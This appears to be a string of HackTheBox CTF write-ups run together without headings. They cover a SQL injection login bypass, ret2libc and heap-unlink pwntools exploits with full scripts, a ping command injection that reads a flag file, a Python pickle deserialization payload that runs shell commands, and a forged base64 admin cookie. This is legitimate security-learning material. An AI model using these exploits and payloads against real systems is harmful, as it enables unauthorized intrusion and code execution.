Analysis

First we're met with a signin form:

Let's try some default creds, admin and admin.

Below, the query run on the database is shown; this seems like a clear example of SQL injection.

Exploitation

Ultimately, we want to try and log in as a user. To do this, we can try to inject our own SQL.

We know the payload looks like the following:

We want to trick this into always returning a user, and to do this we'll inject a clause that's always true, such as 1=1.

That will make the query equal to the following:

So here, it'll compare the username to admin, and if it's not the same the check will still pass because 1=1. However, there's a small issue with the password still being wrong. To bypass this check, we'll make everything after our injection a comment so that the databse ignores it:

That would make the query be:

As you can see, the username will always be correct due to the 1=1 and the password check is commented out! Let's try it.

We still have to input a password because some javascript checks to make sure it's there, but we can fill that with any rubbish. And we get the flag!

HTB{SQL_1nj3ct1ng_my_w4y_0utta_h3r3}

Overview

Ropme was an 80pts challenge rated as Hard on HackTheBox. Personally, I don't believe it should have been a hard; the technique used is fairly common and straightforward, and the high points and difficulty is probably due to it being one of the first challenge on the platform.

Exploiting the binary involved executing a ret2plt attack in order to leak the libc version before gaining RCE using a ret2libc.

Analysis

$ ./ropme 
ROP me outside, how 'about dah?
test

One output, one input, then the program breaks.

$ rabin2 -I ropme
bits     64
canary   false
nx       true
pic      false
relro    partial

No PIE, meaning we can pull off the ret2plt. Let's leak the libc version.

from pwn import *

elf = context.binary = ELF('./ropme')
libc = elf.libc
p = elf.process()

# ret2plt
rop = ROP(elf)

rop.raw('A' * 72)
rop.puts(elf.got['puts'])
rop.raw(elf.symbols['main'])

p.sendline(rop.chain())

# read the leaked puts address
p.recvline()
puts = u64(p.recv(6) + b'\x00\x00')
log.success(f'Leaked puts: {hex(puts)}')

# Get base
libc.address = puts - libc.symbols['puts']
log.success(f'Libc base: {hex(libc.address)}')

We can now leak other symbols in order to pinpoint the libc version, for which you can use something like here. Once you've done that, it's a simple ret2libc.

Final Exploit

from pwn import *

elf = context.binary = ELF('./ropme')

if args.REMOTE:
    libc = ELF('./libc-remote.so', checksec=False)
    p = remote('docker.hackthebox.eu', 31919)
else:
    libc = elf.libc
    p = elf.process()

# ret2plt
rop = ROP(elf)

rop.raw('A' * 72)
rop.puts(elf.got['puts'])
rop.raw(elf.symbols['main'])

p.sendline(rop.chain())

### Pad with \x00 to get to correct length of 8 bytes
p.recvline()
puts = u64(p.recv(6) + b'\x00\x00')
log.success(f'Leaked puts: {hex(puts)}')

# Get base
libc.address = puts - libc.symbols['puts']
log.success(f'Libc base: {hex(libc.address)}')


# ret2libc
binsh = next(libc.search(b'/bin/sh\x00'))

rop = ROP(libc)
rop.raw('A' * 72)
rop.system(binsh)

p.sendline(rop.chain())

p.interactive()

# HTB{r0p_m3_if_y0u_c4n!}

Summary

TODO

Overview

Dream Diary: Chapter 1 (known as DD1) was an insane pwn challenge. It is one of the few heap challenges on HackTheBox and, while it took a great deal of time to understand, was probably one of the most satisfying challenges I've done.

There were two (main) ways to solve this challenge: utilising an unlink exploit and overlapping chunks then performing a fastbin attack. I'll detail both of these, but first we'll identify the bug and what it allows us to do.

Analysis

Let's have a look at what we can do.

ironstone@ubuntu:~/Desktop/hackthebox/chapter1$ ./chapter1 

+------------------------------+
|         Dream Diary          |
+------------------------------+
| [1] Allocate                 |
| [2] Edit                     |
| [3] Delete                   |
| [4] Exit                     |
+------------------------------+
>> 1

Size: 20
Data: ye
Success!
[...]

So at first look we can create, edit and delete chunks. Fairly standard heap challenge.

Decompilation

Now we'll check out the binary in more detail.

Allocate

/* Find free chunk index in the list */

/* Input size */

chunk = malloc(size);
*(void **)(&CHUNKLIST + (long)index * 8) = chunk; /* Add chunk address to list */

/* Check for Malloc Errors */

printf("Data: ");
read(*(void **)(&CHUNKLIST + index * 8), size);
puts("Success!");

Very simplified, but it takes in a size and then calls malloc() to assign a chunk of that size and reads that much data into the chunk.

Edit

/* Input index */

/* check 0 <= index <= 15 */
/* Check if chunk address in list is zero - if it is, detect the UAF */

/* Read length of data stored there */
size = strlen(*(char **)(&CHUNKLIST + index * 8));
printf("Data: ");
read(*(void **)(&CHUNKLIST + index * 8), size);
puts("Done!");

Again, quite simplified. Calls strlen() on the data there, reads that many bytes in.

Delete

/* Input index */

/* check 0 <= index <= 15 */
/* Check if chunk address in list is zero - if it is, detect the UAF */

free(*(void **)(&CHUNKLIST + index * 8));     /* Free the chunk */
*(&CHUNKLIST + index * 8) = 0; /* Zero out the entry - stop UAF and double-free */
puts("Done!");

Finding the bug

The delete() function is secure, so it's clearly not an issue with the way the chunk is freed. Now we can check the functions that write data, allocate() and edit().

allocate() only ever inputs how much it allocates, so it's secure. The bug is in edit():

size = strlen(*(char **)(&CHUNKLIST + index * 8));
read(*(void **)(&CHUNKLIST + index * 8), size);

Remember that strlen() stops at a null byte. If we completely fill up our buffer the first time we allocate, there are no null bytes there. Instead, we will continue into the size field of the next chunk.

Provided the size field is greater than 0x0 - which is will be - strlen() will interpret it as part of the string. That only gives us an overflow of one or two bytes.

But what can we do with that? The last 3 bits of the size field are taken up by the flags, the important one for this being the prev_in_use bit. If it is not set (i.e. 0) then we can use PREV_SIZE to calculate the size of the previous chunk. If we overwrite P to be 0, we can fake PREV_SIZE as it's originally part of the previous chunk's data.

How we can utilise this will be detailed in the subpages.

Scripting

Some helper functions to automate the actions.

from pwn import *

elf = context.binary = ELF('./chapter1', checksec=False)
libc = elf.libc
p = process()

CHUNKLIST = 0x6020c0

def alloc(size=0x98, data='a'):
    p.sendlineafter('>> ', '1')
    p.sendlineafter('Size: ', str(size))
    p.sendlineafter('Data: ', data)

def free(idx=0):
    p.sendlineafter('>> ', '3')
    p.sendlineafter('Index: ', str(idx))

def edit(idx=0, data='a'):
    p.sendlineafter('>> ', '2')
    p.sendlineafter('Index: ', str(idx))
    p.sendlineafter('Data: ', data)

Analysis

When we start the instance, we are met with an options menu:

It appears as if we can input the IP, which is then pinged. Let's imagine for a second how this could be implemented on the server side. A common trap developers can fall into is doing something like:

system("ping -c 4 " + ip);

Essentially, we're passing the parameters to bash. This means we could, theoretically, insert a ; character into the ip variable, and everything behind it would be interpreted as a seperate command, e.g.:

system("ping -c 4 178.62.0.100; ls");

Here, ls would be run as a separate command. Let's see if it works!

Exploitation

Let's try it by simply inputting ; ls to the end of the IP and submitting:

PING 178.62.0.100 (178.62.0.100): 56 data bytes
--- 178.62.0.100 ping statistics ---
4 packets transmitted, 0 packets received, 100% packet loss
index.php

Look - as well as the ping command, we get index.php, which is the result of the ls command!

There doesn't appear to be a flag, so we'll try ; ls / to read the root directory next:

PING 178.62.0.100 (178.62.0.100): 56 data bytes
--- 178.62.0.100 ping statistics ---
4 packets transmitted, 0 packets received, 100% packet loss
bin
boot
dev
entrypoint.sh
etc
flag_2viTb
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
www

Woo - there's a flag_2viTb file! Now we'll inject ; cat /flag_2viTb to read the flag:

PING 178.62.0.100 (178.62.0.100): 56 data bytes
--- 178.62.0.100 ping statistics ---
4 packets transmitted, 0 packets received, 100% packet loss
HTB{I_f1n4lly_l00k3d_thr0ugh_th3_rc3}

And boom, we've got the flag - HTB{I_f1n4lly_l00k3d_thr0ugh_th3_rc3}.

Automation

Because I prefer a command-line interface, I originally created a simple script to inject parameters for me:

from requests import post

cmd = input('>> ')

data = {'test': 'ping', 'ip_address': f'178.62.0.100; {cmd}', 'submit': 'Test'}
r = post('http://178.62.0.100:30134/', data=data)

data = r.text
data = data.split('packet loss\n')[-1]
data = data.split('</textarea>')[0]

print(data.strip())

This simply inputs the command as cmd, sets the POST parameters, and (really messily) parses the response to return just the data.

$ python3 exploit.py 
>> cat /flag_2viTb      
HTB{I_f1n4lly_l00k3d_thr0ugh_th3_rc3}

Checking the Source

We can inject cat index.php to see what exactly was happening, and we immediately see the following lines:

function runTest($test, $ip_address)
{
    if ($test === 'ping')
    {
        system("ping -c4 ${ip_address}");
    }
    if ($test === 'traceroute')
    {
        system("traceroute ${ip_address}");
    }
}

As we guessed, it passed in the input without sanitising it to remove potential injection.

Summary

In this approach, we overwrite PREV_SIZE to shrink the size of the previous chunk. This tricks the heap into thinking that the previous chunk's metadata starts where our data does, enabling us to control chunk metadata. As we can control the fd and bk pointers, we can execute an unlink exploit. We can bypass the unlink security checks by pointing fd and bk to the chunklist, which contains a pointer to the chunk.

This enables us to overwrite a chunklist entry with the address of the chunklist itself, meaning we can now edit the chunklist. This gives us the ability to write to wherever we want, and we choose to target the GOT. We can overwrite strlen@got with puts@plt as that makes it functionally equivalent and then read a libc address. From here we overwrite free@got with the address of system and free() a chunk containing /bin/sh.

Exploitation

The Unlink

To bypass the unlink check, we need P->fd->bk to point to the address of P, meaning P->fd has to point 0x18 bytes behind it. Because we want P->fd to be within the chunklist (most simply at the beginning), we will allocate 3 chunks before the chunk we use for the unlink() exploit. Each chunk we allocate takes up 0x8 bytes of space on the chunklist (this will make more sense later, I promise).

We'll choose a size of 0x98 for the chunks. Firstly, this means the chunk does not fall in fastbin range. Secondly, the additional 0x8 bytes means we do in fact overwrite prev_size. Other sizes such as 0x108 would also work, but make sure Chunk 4 overwrites Chunk 5's prev_size field.

alloc()
alloc()
alloc()
alloc(data='A' * 0x98)
alloc()

Now we will create a fake chunk. The fake size we give it will be the difference between the start of our fake data and the next consecutive chunk. In this case, that is 0x90 - as you see from the image, the difference between chunks 4 and 5 is 0xa0, so if we remove the metadata the fake chunk is 0x90. We'll also overwrite PREV_IN_USE to trick it into thinking it's free.

fake_chunk = flat(
    0x0,                # fake prev_size (of fake chunk)
    0x91,               # fake size
    CHUNKLIST,          # fd (controlled)
    CHUNKLIST + 8,      # bk (controlled)
    b'A' * 0x70,        # pad to -8 off max size so we can fake prev_size
    0x90                # fake prev_size
)
fake_chunk += p16(0xa0) # overwrite PREV_IN_USE

edit(3, fake_chunk)

And if we send this all off, we can see it worked perfectly:

radare2 tells us chunk 4 is free. Chunk 5 has a new prev_size and P is no longer set. If we run dmhc again to view the chunk at location of chunk 5 - 0x90, our fake chunk is set up exactly as planned.

Now we free chunk 5, making Chunks 4 and 5 consolidate. This triggers a call to the unlink() macro on Chunk 4. Let's look at how we expect the unlink to go.

FD = P->fd            (= CHUNKLIST)
BK = P->bk            (= CHUNKLIST + 8)

FD->bk = BK           (CHUNKLIST + 0x18 = CHUNKLIST)
BK->fd = FD           (CHUNKLIST + 8 + 0x10 = CHUNKLIST)

Both writes write to CHUNKLIST + 0x18, and the value written is the address of the chunklist. Now, if we edit Chunk 3, we're actually editing the chunklist itself as that's where the pointer points to.

We also manage to bypass the unlink check by getting FD->bk and BK->fd to point at the chunk's entry in the list.

Note that the value written was the location of fd, so if the chunk we overflowed with was Chunk 0 we would have had to write to a location ahead of the chunklist in memory in order to bypass the check, and pad all the way to the start before we could edit chunklist entries. By allocating 3 chunks before the overflow chunk we were able to write the chunklist address to entry 4 directly and bypass the check, meaning we had to mess around with padding less.

And it definitely worked:

LIBC Leak

Editing Chunk 3 now edits the chunklist itself, meaning we can overwrite pointers and gain arbitrary writes.

If we go back to the disassembly of edit(), we notice strlen() is called on the chunk data. We can overwrite strlen@got with puts@plt to print out this data instead - and using puts has an additional benefit: puts also returns the length of the string it reads. This means the program will not break, but we'll still gain the additional functionality.

Once we overwrite strlen@got, we'll call edit() on another GOT entry (free) to leak libc.

# now we write strlen@GOT to the chunklist
edit(3, p64(elf.got['strlen']))
edit(0, p64(elf.plt['puts']))

# now when we edit() we read chunk contents
# but strlen@got holds a PLT address, so let's change the GOT entry for the leak
edit(3, p64(elf.got['free']))

Now we just attempt to edit Chunk 0. Because it would print the libc address as soon as we enter the index, we'll have to do this part manually or the p.sendlineafter() lines would skip over the leak.

p.sendline('2')
p.sendlineafter('Index: ', '0')

print(p.clean())

The response we get is

b'@u\xdb%\xc0\x7f\nData: '

So it worked! Let's just parse the response and print out the leak.

free_leak = u64(p.recv(6) + b'\x00\x00')
log.success('Free Leak: ' + hex(free_leak))
libc.address = free_leak - libc.symbols['free']
log.success('Libc base: ' + hex(libc.address))

p.recvuntil('Data: ')                       # just receive the rest

[+] Free Leak: 0x7f2211927540
[+] Libc base: 0x7f22118a3000

Perfect.

Getting a Shell

This is quite simple - change a GOT entry such as free and replace it with system. Then, if the chunk contains /bin/sh, it'll get passed to the function as a parameter.

You may notice the 2nd and 3rd chunks have been untouched so far, so we could easily place the /bin/sh in one of those right at the beginning for use now.

# right at the beginning
alloc()
alloc(data='/bin/sh\x00')
alloc()
alloc(data='A' * 0x98)
alloc()

We're currently halfway through using edit() on free@got, so we can just continue inputting system@libc as the data, then free Chunk 1.

p.sendline(p64(libc.symbols['system']))     # pass in system@libc as the data
free(1)     # trigger system@libc with the parameter /bin/sh

p.interactive()

And boom - success!

[+] Free Leak: 0x7f04d4413540
[+] Libc base: 0x7f04d438f000
[*] Switching to interactive mode
$ ls
chapter1  exploit.py

Moving to Remote

There are a few changes we need to make remotely. Firstly, the libc may be different (it was for me). Simply leak a couple more libc addresses and use somewhere like here to identify the libc version. We can also change the beginning of our script.

if args.REMOTE:
    p = remote('167.71.140.171', 31713)
    libc = ELF('./libc-remote.so')
else:
    p = process()
    libc = elf.libc

Secondly, the way the service uses socat means it echoes our input back to us. Because of the way we use p.sendlineafter(), this doesn't affect us until we parse the libc leak. We can just listen to the extra data if it's on REMOTE mode.

if args.REMOTE:
    p.recvuntil('0\r\n')        # echoed back

free_leak = u64(p.recv(6) + b'\x00\x00')    # now leak as usual
# [...]

Thirdly, the socat used has pty enabled. This means it interprets the \x7f we send as the ascii representation of backspace, which would delete anything we sent. To mitigate this (it's only relevant when sending system) we just check if we're on REMOTE mode and if we are we can escape the \x7f with \x16, the socat escape character.

system = p64(libc.symbols['system'])

if args.REMOTE:
    system = system.replace(b'\x7f', b'\x16\x7f')   # escape backspace

p.sendline(system)

And it works perfectly!

[+] Free Leak: 0x7fe8285324f0
[+] Libc base: 0x7fe8284ae000
[*] Switching to interactive mode
$ cat flag
HTB{Singl3?_NO!_D0ubl3?_NO!_Tr1pl3_Unsaf3_Unlink}

Final Exploit

from pwn import *

elf = context.binary = ELF('./chapter1', checksec=False)

if args.REMOTE:
    p = remote('178.62.90.208', 30352)
    libc = ELF('./libc-remote.so')
else:
    p = process()
    libc = elf.libc

CHUNKLIST = 0x6020c0

def alloc(size=0x98, data='a'):
    p.sendlineafter('>> ', '1')
    p.sendlineafter('Size: ', str(size))
    p.sendlineafter('Data: ', data)

def free(idx):
    p.sendlineafter('>> ', '3')
    p.sendlineafter('Index: ', str(idx))

def edit(idx, data='a'):
    p.sendlineafter('>> ', '2')
    p.sendlineafter('Index: ', str(idx))
    p.sendlineafter('Data: ', data)

alloc()
alloc(data='/bin/sh\x00')
alloc()
alloc(data='A' * 0x98)
alloc()

fake_chunk = flat(
    0x0,                # fake prev_size (of fake chunk)
    0x91,               # fake size
    CHUNKLIST,          # fd (controlled)
    CHUNKLIST + 8,      # bk (controlled)
    b'A' * (0x70),      # pad to -8 off max size so we can fake prev_size
    0x90                # fake prev_size
)
fake_chunk += p16(0xa0) # overwrite PREV_IN_USE

edit(3, fake_chunk)
free(4)

# now we write strlen@GOT to the chunklist
edit(3, p64(elf.got['strlen']))
edit(0, p64(elf.plt['puts']))

# now when we edit() we read chunk contentx
# but strlen@got holds a PLT address, so let's change the GOT entry for the leak
edit(3, p64(elf.got['free']))

# have to do this one part at a time to grab the address
p.sendline('2')
p.sendlineafter('Index: ', '0')

if args.REMOTE:
    p.recvuntil('0\r\n')

free_leak = u64(p.recv(6) + b'\x00\x00')
log.success('Free Leak: ' + hex(free_leak))
libc.address = free_leak - libc.symbols['free']
log.success('Libc base: ' + hex(libc.address))

p.recvuntil('Data: ')                       # just receive the rest

# send system
system = p64(libc.symbols['system'])

if args.REMOTE:
    system = system.replace(b'\x7f', b'\x16\x7f')   # socat badchars - \x7f interpreted as backspace, escape with \x16

p.sendline(system)

free(1)

p.interactive()

Analysis

All the references to pickles implies it's an insecure deserialization challenge. pickle is a serialization format used in python.

If we check the cookies, we get the following:

plan_b=KGRwMApTJ3NlcnVtJwpwMQpjY29weV9yZWcKX3JlY29uc3RydWN0b3IKcDIKKGNfX21haW5fXwphbnRpX3BpY2tsZV9zZXJ1bQpwMwpjX19idWlsdGluX18Kb2JqZWN0CnA0Ck50cDUKUnA2CnMu

Our guess is that this is a pickled python object, and decoding the base64 seems to imply that to us too:

$ echo 'KGRwMApTJ3NlcnVtJwpwMQpjY29weV9yZWcKX3JlY29uc3RydWN0b3IKcDIKKGNfX21haW5fXwphbnRpX3BpY2tsZV9zZXJ1bQpwMwpjX19idWlsdGluX18Kb2JqZWN0CnA0Ck50cDUKUnA2CnMu' | base64 -d
(dp0
S'serum'
p1
ccopy_reg
_reconstructor
p2
(c__main__
anti_pickle_serum
p3
c__builtin__
object
p4
Ntp5
Rp6
s.

Unpickling

Let's immediately try to unpickle the data, which should give us a feel for how data is parsed:

from base64 import b64decode

import pickle

code = b'KGRwMApTJ3NlcnVtJwpwMQpjY29weV9yZWcKX3JlY29uc3RydWN0b3IKcDIKKGNfX21haW5fXwphbnRpX3BpY2tsZV9zZXJ1bQpwMwpjX19idWlsdGluX18Kb2JqZWN0CnA0Ck50cDUKUnA2CnMu'

serum = pickle.loads(b64decode(code))
print(serum)

$ python3 deserialize.py 
Traceback (most recent call last):
  File "deserialize.py", line 7, in <module>
    serum = pickle.loads(b64decode(code))
AttributeError: Can't get attribute 'anti_pickle_serum' on <module '__main__' from 'deserialize.py'>

The error is quite clear - there's no anti_pickle_serum variable. Let's add one in and try again.

code = b'KGRwMApT[...]'
anti_pickle_serum = 'test'

That error is fixed, but there's another one:

$ python3 deserialize.py 
Traceback (most recent call last):
  File "deserialize.py", line 8, in <module>
    serum = pickle.loads(b64decode(code))
  File "/usr/lib/python3.8/copyreg.py", line 43, in _reconstructor
    obj = object.__new__(cls)
TypeError: object.__new__(X): X is not a type object (str)

Here it's throwing an error because X (anti_pickle_serum) is not a type object - so let's make it a class extending from object!

# [imports]
class anti_pickle_serum(object):
    def __init__(self):
        pass
# [...]

And now there's no error, and we get a response!

$ python3 deserialize.py 
{'serum': <__main__.anti_pickle_serum object at 0x7f9e1a1b1c40>}

So the cookie is the pickled form of a dictionary with the key serum and the value of an anti_pickle_serum class! Awesome.

Exploitation

For an introduction to pickle exploitation, I highly recommend this blog post. Essentially, the __reduce__ dunder method tells pickle how to deserialize, and to do so it takes a function and a list of parameters. We can set the function to os.system and the parameters to the code to execute!

from base64 import b64encode

import pickle
import os

class anti_pickle_serum(object):
    def __reduce__(self):               # function called by the pickler
        return os.system, (['whoami'],)

code = pickle.dumps({'serum': anti_pickle_serum()})
code = b64encode(code)
print(code)

Here we create the malicious class, then serialize it as part of the dictionary as we saw before.

$ python3 final.py 
b'gASVLAAAAAAAAAB9lIwFc2VydW2UjAVwb3NpeJSMBnN5c3RlbZSTlIwGd2hvYW1plIWUUpRzLg=='

Huh, that looks nothing like the original cookie value (which starts with KGRwMApTJ3)... maybe we missed something with the dumps?

Checking out the dumps() documentation, there is a protocol parameter! If we read a bit deeper, this can take a value from 0 to 5. If we play around, protocol=0 looks similar to the original cookie:

code = pickle.dumps({'serum': anti_pickle_serum()}, protocol=0)

$ python3 final.py 
b'KGRwMApWc2VydW0KcDEKY3Bvc2l4CnN5c3RlbQpwMgooVndob2FtaQpwMwp0cDQKUnA1CnMu'

Let's change the cookie to this (without the b''):

As you can see now, the value 0 was returned. This is the return value of os.system! Now we simply need to find a function that returns the result, and we'll use subprocess.check_output for that.

return subprocess.check_output, (['ls'],)

Now run it

$ python final.py 
KGRwMApTJ3NlcnVtJwpwMQpjc3VicHJvY2VzcwpjaGVja19vdXRwdXQKcDIKKChscDMKUydscycKcDQKYXRwNQpScDYKcy4=

And input it as the cookie.

As can now see that there is a flag_wIp1b file, so we can just read it!

While it's tempting to do

return subprocess.check_output, (['cat flag_wIp1b'],)

subprocess.check_output requires a list of parameters (as we see here) and the filename is a separate item in the list, like so:

return subprocess.check_output, (['cat', 'flag_wIp1b'],)

$ python final.py 
KGRwMApTJ3NlcnVtJwpwMQpjc3VicHJvY2VzcwpjaGVja19vdXRwdXQKcDIKKChscDMKUydjYXQnCnA0CmFTJ2ZsYWdfd0lwMWInCnA1CmF0cDYKUnA3CnMu

And boom - we get the flag!

HTB{g00d_j0b_m0rty...n0w_I_h4v3_to_g0_to_f4m1ly_th3r4py..}

Analysis

We are first greeted by a login page. Let's, once again, try admin with password admin:

Invalid username or password

Looks like we'll have to create an account - let's try those credentials.

this user already exists

This is great, because now we know we need a user called admin. Let's create another user - I'll use username and password yes, because I doubt that'll be used.

We're redirected to the login, which makes it seem like it worked. Let's log in with the credentials we just created:

Whoops, guess we're not an admin!

When it comes to accounts, one very common thing to check is cookies. Cookies allow, among other things, for users to authenticate without logging in every time. To check cookies, we can right-click and hit Inspect Element and then move to the Console tab and type document.cookie.

Well, we have a cookie called PHPSESSID and the value eyJ1c2VybmFtZSI6InllcyJ9. Cookies are often base64 encoded, so we'll use a tool called CyberChef to decode it.

Once we decode the base64, we see that the contents are simply {"username":"yes"}.

Exploitation

So, the website knows our identity due to our cookie - but what's to stop us from forging a cookie? Since we control the cookies we send, we can just edit them. Let's create a fake cookie!

Note that we're URL encoding it as it ends in the special character =, which usually has to be URL encoded in cookies. Let's change our cookie to eyJ1c2VybmFtZSI6ImFkbWluIn0%3D!

Ignore the warning, but we've now set document.cookie. Refresh the page to let it send the cookies again.

And there you go - we successfully authenticated as an admin!

HTB{s3ss10n_1nt3grity_1s_0v3r4tt3d_4nyw4ys}